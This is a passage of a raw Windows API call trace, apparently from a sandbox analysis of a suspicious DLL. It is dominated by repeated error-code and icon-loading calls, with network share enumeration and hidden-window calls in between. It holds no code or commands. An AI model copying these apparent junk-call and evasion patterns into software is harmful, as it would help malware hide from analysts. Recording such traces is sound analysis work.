GetLastError () returned 0x0 [0037.209] SetLastError (dwErrCode=0x0) [0037.209] GetLastError () returned 0x0 [0037.210] SetLastError (dwErrCode=0x0) [0037.210] GetLastError () returned 0x0 [0037.210] SetLastError (dwErrCode=0x0) [0037.210] GetLastError () returned 0x0 [0037.210] SetLastError (dwErrCode=0x0) [0037.210] GetLastError () returned 0x0 [0037.210] SetLastError (dwErrCode=0x0) [0037.210] GetLastError () returned 0x0 [0037.210] SetLastError (dwErrCode=0x0) [0037.210] GetLastError () returned 0x0 [0037.210] SetLastError (dwErrCode=0x0) [0037.210] GetLastError () returned 0x0 [0037.210] SetLastError (dwErrCode=0x0) [0037.210] GetLastError () returned 0x0 [0037.210] SetLastError (dwErrCode=0x0) [0037.210] GetLastError () returned 0x0 [0037.210] SetLastError (dwErrCode=0x0) [0037.210] GetLastError () returned 0x0 [0037.210] SetLastError (dwErrCode=0x0) [0037.210] GetLastError () returned 0x0 [0037.210] SetLastError (dwErrCode=0x0) [0037.210] GetLastError () returned 0x0 [0037.210] SetLastError (dwErrCode=0x0) [0037.210] GetLastError () returned 0x0 [0037.210] SetLastError (dwErrCode=0x0) [0037.210] GetLastError () returned 0x0 [0037.210] SetLastError (dwErrCode=0x0) [0037.210] GetLastError () returned 0x0 [0037.210] SetLastError (dwErrCode=0x0) [0037.210] GetLastError () returned 0x0 [0037.210] SetLastError (dwErrCode=0x0) [0037.210] GetLastError () returned 0x0 [0037.210] SetLastError (dwErrCode=0x0) [0037.210] GetLastError () returned 0x0 [0037.210] SetLastError (dwErrCode=0x0) [0037.210] GetLastError () returned 0x0 [0037.210] SetLastError (dwErrCode=0x0) [0037.210] GetLastError () returned 0x0 [0037.211] SetLastError (dwErrCode=0x0) [0037.211] GetLastError () returned 0x0 [0037.211] SetLastError (dwErrCode=0x0) [0037.211] GetLastError () returned 0x0 [0037.211] SetLastError (dwErrCode=0x0) [0037.211] GetLastError () returned 0x0 [0037.211] SetLastError (dwErrCode=0x0) [0037.211] GetLastError () returned 0x0 [0037.211] SetLastError (dwErrCode=0x0) [0037.211] GetLastError () returned 0x0 [0037.211] SetLastError (dwErrCode=0x0) [0037.211] GetLastError () returned 0x0 [0037.211] SetLastError (dwErrCode=0x0) [0037.211] GetLastError () returned 0x0 [0037.211] SetLastError (dwErrCode=0x0) [0037.211] GetLastError () returned 0x0 [0037.211] SetLastError (dwErrCode=0x0) [0037.211] GetLastError () returned 0x0 [0037.211] SetLastError (dwErrCode=0x0) [0037.211] GetLastError () returned 0x0 [0037.211] SetLastError (dwErrCode=0x0) [0037.211] GetLastError () returned 0x0 [0037.211] SetLastError (dwErrCode=0x0) [0037.211] GetLastError () returned 0x0 [0037.211] SetLastError (dwErrCode=0x0) [0037.211] GetLastError () returned 0x0 [0037.211] SetLastError (dwErrCode=0x0) [0037.211] GetLastError () returned 0x0 [0037.211] SetLastError (dwErrCode=0x0) [0037.211] GetLastError () returned 0x0 [0037.211] SetLastError (dwErrCode=0x0) [0037.211] GetLastError () returned 0x0 [0037.211] SetLastError (dwErrCode=0x0) [0037.211] GetLastError () returned 0x0 [0037.211] SetLastError (dwErrCode=0x0) [0037.211] GetLastError () returned 0x0 [0037.211] SetLastError (dwErrCode=0x0) [0037.211] GetLastError () returned 0x0 [0037.211] SetLastError (dwErrCode=0x0) [0037.211] GetLastError () returned 0x0 [0037.212] SetLastError (dwErrCode=0x0) [0037.212] GetLastError () returned 0x0 [0037.212] SetLastError (dwErrCode=0x0) [0037.212] GetLastError () returned 0x0 [0037.212] SetLastError (dwErrCode=0x0) [0037.212] GetLastError () returned 0x0 [0037.212] SetLastError (dwErrCode=0x0) [0037.212] GetLastError () returned 0x0 [0037.212] SetLastError (dwErrCode=0x0) [0037.212] GetLastError () returned 0x0 [0037.212] SetLastError (dwErrCode=0x0) [0037.212] GetLastError () returned 0x0 [0037.212] SetLastError (dwErrCode=0x0) [0037.212] GetLastError () returned 0x0 [0037.212] SetLastError (dwErrCode=0x0) [0037.212] GetLastError () returned 0x0 [0037.212] SetLastError (dwErrCode=0x0) [0037.212] GetLastError () returned 0x0 [0037.212] SetLastError (dwErrCode=0x0) [0037.212] GetLastError () returned 0x0 [0037.212] SetLastError (dwErrCode=0x0) [0037.212] GetLastError () returned 0x0 [0037.212] SetLastError (dwErrCode=0x0) [0037.212] GetLastError () returned 0x0 [0037.212] SetLastError (dwErrCode=0x0) [0037.212] GetLastError () returned 0x0 [0037.212] SetLastError (dwErrCode=0x0) [0037.212] GetLastError () returned 0x0 [0037.212] SetLastError (dwErrCode=0x0) [0037.212] GetLastError () returned 0x0 [0037.212] SetLastError (dwErrCode=0x0) [0037.212] GetLastError () returned 0x0 [0037.212] SetLastError (dwErrCode=0x0) [0037.212] GetLastError () returned 0x0 [0037.212] SetLastError (dwErrCode=0x0) [0037.212] GetLastError () returned 0x0 [0037.212] SetLastError (dwErrCode=0x0) [0037.212] GetLastError () returned 0x0 [0037.212] SetLastError (dwErrCode=0x0) [0037.213] GetLastError () returned 0x0 [0037.213] SetLastError (dwErrCode=0x0) [0037.214] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0037.214] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0037.214] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1001f791) returned 0x0 [0037.214] GetLastError () returned 0x0 [0037.214] SetLastError (dwErrCode=0x0) [0037.214] GetLastError () returned 0x0 [0037.214] SetLastError (dwErrCode=0x0) [0037.214] GetLastError () returned 0x0 [0037.214] SetLastError (dwErrCode=0x0) [0037.214] GetLastError () returned 0x0 [0037.214] SetLastError (dwErrCode=0x0) [0037.214] GetLastError () returned 0x0 [0037.214] SetLastError (dwErrCode=0x0) [0037.214] GetLastError () returned 0x0 [0037.214] SetLastError (dwErrCode=0x0) [0037.214] GetLastError () returned 0x0 [0037.214] SetLastError (dwErrCode=0x0) [0037.214] GetLastError () returned 0x0 [0037.214] SetLastError (dwErrCode=0x0) [0037.214] GetLastError () returned 0x0 [0037.214] SetLastError (dwErrCode=0x0) [0037.214] GetLastError () returned 0x0 [0037.214] SetLastError (dwErrCode=0x0) [0037.215] GetLastError () returned 0x0 [0037.215] SetLastError (dwErrCode=0x0) [0037.215] GetLastError () returned 0x0 [0037.215] SetLastError (dwErrCode=0x0) [0037.215] GetLastError () returned 0x0 [0037.215] SetLastError (dwErrCode=0x0) [0037.215] GetLastError () returned 0x0 [0037.215] SetLastError (dwErrCode=0x0) [0037.215] GetLastError () returned 0x0 [0037.215] SetLastError (dwErrCode=0x0) [0037.215] GetLastError () returned 0x0 [0037.215] SetLastError (dwErrCode=0x0) [0037.215] GetLastError () returned 0x0 [0037.215] SetLastError (dwErrCode=0x0) [0037.215] GetLastError () returned 0x0 [0037.215] SetLastError (dwErrCode=0x0) [0037.215] GetLastError () returned 0x0 [0037.215] SetLastError (dwErrCode=0x0) [0037.215] GetLastError () returned 0x0 [0037.215] SetLastError (dwErrCode=0x0) [0037.215] GetLastError () returned 0x0 [0037.215] SetLastError (dwErrCode=0x0) [0037.215] GetLastError () returned 0x0 [0037.215] SetLastError (dwErrCode=0x0) [0037.215] GetLastError () returned 0x0 [0037.215] SetLastError (dwErrCode=0x0) [0037.215] GetLastError () returned 0x0 [0037.215] SetLastError (dwErrCode=0x0) [0037.215] GetLastError () returned 0x0 [0037.215] SetLastError (dwErrCode=0x0) [0037.215] GetLastError () returned 0x0 [0037.215] SetLastError (dwErrCode=0x0) [0037.215] GetLastError () returned 0x0 [0037.215] SetLastError (dwErrCode=0x0) [0037.215] GetLastError () returned 0x0 [0037.215] SetLastError (dwErrCode=0x0) [0037.215] GetLastError () returned 0x0 [0037.215] SetLastError (dwErrCode=0x0) [0037.216] GetLastError () returned 0x0 [0037.216] SetLastError (dwErrCode=0x0) [0037.216] GetLastError () returned 0x0 [0037.216] SetLastError (dwErrCode=0x0) [0037.216] GetLastError () returned 0x0 [0037.216] SetLastError (dwErrCode=0x0) [0037.216] GetLastError () returned 0x0 [0037.216] SetLastError (dwErrCode=0x0) [0037.216] GetLastError () returned 0x0 [0037.216] SetLastError (dwErrCode=0x0) [0037.216] GetLastError () returned 0x0 [0037.216] SetLastError (dwErrCode=0x0) [0037.216] GetLastError () returned 0x0 [0037.216] SetLastError (dwErrCode=0x0) [0037.216] GetLastError () returned 0x0 [0037.216] SetLastError (dwErrCode=0x0) [0037.216] GetLastError () returned 0x0 [0037.216] SetLastError (dwErrCode=0x0) [0037.216] GetLastError () returned 0x0 [0037.216] SetLastError (dwErrCode=0x0) [0037.216] GetLastError () returned 0x0 [0037.216] SetLastError (dwErrCode=0x0) [0037.216] GetLastError () returned 0x0 [0037.216] SetLastError (dwErrCode=0x0) [0037.216] GetLastError () returned 0x0 [0037.216] SetLastError (dwErrCode=0x0) [0037.216] GetLastError () returned 0x0 [0037.216] SetLastError (dwErrCode=0x0) [0037.216] GetLastError () returned 0x0 [0037.216] SetLastError (dwErrCode=0x0) [0037.216] GetLastError () returned 0x0 [0037.216] SetLastError (dwErrCode=0x0) [0037.216] GetLastError () returned 0x0 [0037.216] SetLastError (dwErrCode=0x0) [0037.216] GetLastError () returned 0x0 [0037.216] SetLastError (dwErrCode=0x0) [0037.216] GetLastError () returned 0x0 [0037.216] SetLastError (dwErrCode=0x0) [0037.217] GetLastError () returned 0x0 [0037.217] SetLastError (dwErrCode=0x0) [0037.217] GetLastError () returned 0x0 [0037.217] SetLastError (dwErrCode=0x0) [0037.217] GetLastError () returned 0x0 [0037.217] SetLastError (dwErrCode=0x0) [0037.217] GetLastError () returned 0x0 [0037.217] SetLastError (dwErrCode=0x0) [0037.217] GetLastError () returned 0x0 [0037.217] SetLastError (dwErrCode=0x0) [0037.217] GetLastError () returned 0x0 [0037.217] SetLastError (dwErrCode=0x0) [0037.217] GetLastError () returned 0x0 [0037.217] SetLastError (dwErrCode=0x0) [0037.217] GetLastError () returned 0x0 [0037.217] SetLastError (dwErrCode=0x0) [0037.217] GetLastError () returned 0x0 [0037.217] SetLastError (dwErrCode=0x0) [0037.217] GetLastError () returned 0x0 [0037.217] SetLastError (dwErrCode=0x0) [0037.217] GetLastError () returned 0x0 [0037.217] SetLastError (dwErrCode=0x0) [0037.217] GetLastError () returned 0x0 [0037.217] SetLastError (dwErrCode=0x0) [0037.217] GetLastError () returned 0x0 [0037.217] SetLastError (dwErrCode=0x0) [0037.217] GetLastError () returned 0x0 [0037.217] SetLastError (dwErrCode=0x0) [0037.217] GetLastError () returned 0x0 [0037.217] SetLastError (dwErrCode=0x0) [0037.218] WaitForSingleObject (hHandle=0x10000000, dwMilliseconds=0x0) returned 0xffffffff [0037.218] GetLastError () returned 0x6 [0037.218] GetObjectA (in: h=0x0, c=24, pv=0x18e860 | out: pv=0x18e860) returned 0 [0037.218] acmStreamOpen () returned 0xb [0037.220] CreateCompatibleDC (hdc=0x0) returned 0x1f0101a0 [0037.220] GetDeviceCaps (hdc=0x0, index=90) returned 0 [0037.220] CreateFontA (cHeight=0, cWidth=0, cEscapement=0, cOrientation=0, cWeight=500, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x0, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="me") returned 0x160a0852 [0037.220] SelectObject (hdc=0x1f0101a0, h=0x0) returned 0x0 [0037.220] SetStretchBltMode (hdc=0x0, mode=4) returned 0 [0037.222] StretchBlt (hdcDest=0x0, xDest=1, yDest=874, wDest=0, hDest=2, hdcSrc=0x1f0101a0, xSrc=0, ySrc=0, wSrc=1632400, hSrc=0, rop=0xcc0020) returned 0 [0037.222] SetStretchBltMode (hdc=0x0, mode=0) returned 0 [0037.222] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0037.222] SetConsoleWindowInfo (hConsoleOutput=0x0, bAbsolute=1, lpConsoleWindow=0x18e814) returned 0 [0037.222] SetConsoleScreenBufferSize (hConsoleOutput=0x0, dwSize=0x1a0051) returned 0 [0037.222] SetConsoleWindowInfo (hConsoleOutput=0x18e878, bAbsolute=1, lpConsoleWindow=0x18e814) returned 0 [0037.222] GetConsoleWindow () returned 0x0 [0037.222] GetClientRect (in: hWnd=0x0, lpRect=0x18e830 | out: lpRect=0x18e830) returned 0 [0037.223] SetWindowLongA (hWnd=0x0, nIndex=-16, dwNewLong=-2147483648) returned 0 [0037.223] GetWindowLongA (hWnd=0x0, nIndex=-20) returned 0 [0037.223] SetWindowLongA (hWnd=0x0, nIndex=-20, dwNewLong=128) returned 0 [0037.223] SetWindowRgn (hWnd=0x0, hRgn=0x38, bRedraw=1) returned 0 [0037.239] GetDesktopWindow () returned 0x10010 [0037.239] GetWindowRect (in: hWnd=0x10010, lpRect=0x18e7f4 | out: lpRect=0x18e7f4) returned 1 [0037.239] SetWindowPos (hWnd=0x0, hWndInsertAfter=0xffffffff, X=720, Y=-817796, cx=0, cy=0, uFlags=0x21) returned 0 [0037.239] WNetGetConnectionA (in: lpLocalName="", lpRemoteName=0x18de38, lpnLength=0x18de34 | out: lpRemoteName="", lpnLength=0x18de34) returned 0x4b0 [0037.240] WNetOpenEnumA (in: dwScope=0x1, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x18dd20 | out: lphEnum=0x18dd20*=0x58eb58) returned 0x0 [0037.351] WNetEnumResourceA (in: hEnum=0x58eb58, lpcCount=0x18dd1c, lpBuffer=0x5978a0, lpBufferSize=0x18dd14 | out: lpcCount=0x18dd1c, lpBuffer=0x5978a0, lpBufferSize=0x18dd14) returned 0x103 [0037.351] WNetCloseEnum (hEnum=0x58eb58) returned 0x0 [0037.351] NtdllDefWindowProc_A (hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0037.351] CreateSolidBrush (color=0x7aa) returned 0x6100859 [0037.351] SelectObject (hdc=0x1, h=0x6100859) returned 0x0 [0037.351] GetClientRect (in: hWnd=0x0, lpRect=0x18d5b8 | out: lpRect=0x18d5b8) returned 0 [0037.351] FillRect (hDC=0x1, lprc=0x18d5b8, hbr=0x6100859) returned 0 [0037.351] SelectObject (hdc=0x1, h=0x0) returned 0x0 [0037.351] DeleteObject (ho=0x6100859) returned 1 [0037.351] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0037.352] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0037.352] GetStockObject (i=0) returned 0x1900010 [0037.352] CreateWindowExA (dwExStyle=0x0, lpClassName="View", lpWindowName="Viewer", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x10000000, lpParam=0x0) returned 0x0 [0037.352] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0037.352] UpdateWindow (hWnd=0x0) returned 0 [0037.352] LoadAcceleratorsA (hInstance=0x10000000, lpTableName="View") returned 0x0 [0037.352] GetLastError () returned 0x715 [0037.352] SetLastError (dwErrCode=0x715) [0037.352] GetLastError () returned 0x715 [0037.352] SetLastError (dwErrCode=0x715) [0037.352] GetLastError () returned 0x715 [0037.352] SetLastError (dwErrCode=0x715) [0037.352] GetLastError () returned 0x715 [0037.352] SetLastError (dwErrCode=0x715) [0037.352] GetLastError () returned 0x715 [0037.352] SetLastError (dwErrCode=0x715) [0037.352] GetLastError () returned 0x715 [0037.352] SetLastError (dwErrCode=0x715) [0037.352] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.352] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.352] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.353] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.354] LoadIconA (hInstance=0x10000000, lpIconName=0x7f00) returned 0x0 [0037.355] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.355] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x50a0857 [0037.355] GetLastError () returned 0x715 [0037.355] SetLastError (dwErrCode=0x715) [0037.355] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.355] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x50a084d [0037.355] GetLastError () returned 0x715 [0037.355] SetLastError (dwErrCode=0x715) [0037.355] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.355] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0xd0a0726 [0037.355] GetLastError () returned 0x715 [0037.355] SetLastError (dwErrCode=0x715) [0037.355] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.355] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0xb0a071e [0037.355] GetLastError () returned 0x715 [0037.355] SetLastError (dwErrCode=0x715) [0037.356] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.356] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x100a0719 [0037.356] GetLastError () returned 0x715 [0037.356] SetLastError (dwErrCode=0x715) [0037.356] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.356] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x110a0718 [0037.356] GetLastError () returned 0x715 [0037.356] SetLastError (dwErrCode=0x715) [0037.356] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.356] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x90a06f3 [0037.356] GetLastError () returned 0x715 [0037.356] SetLastError (dwErrCode=0x715) [0037.356] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.356] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x100a06ef [0037.356] GetLastError () returned 0x715 [0037.356] SetLastError (dwErrCode=0x715) [0037.356] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.356] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x210a06eb [0037.356] GetLastError () returned 0x715 [0037.356] SetLastError (dwErrCode=0x715) [0037.356] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.356] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x140a06e7 [0037.356] GetLastError () returned 0x715 [0037.356] SetLastError (dwErrCode=0x715) [0037.356] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.356] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x390a06e6 [0037.356] GetLastError () returned 0x715 [0037.356] SetLastError (dwErrCode=0x715) [0037.356] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.356] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x300a0853 [0037.356] GetLastError () returned 0x715 [0037.356] SetLastError (dwErrCode=0x715) [0037.356] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.356] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x110a0844 [0037.356] GetLastError () returned 0x715 [0037.356] SetLastError (dwErrCode=0x715) [0037.356] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.356] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, 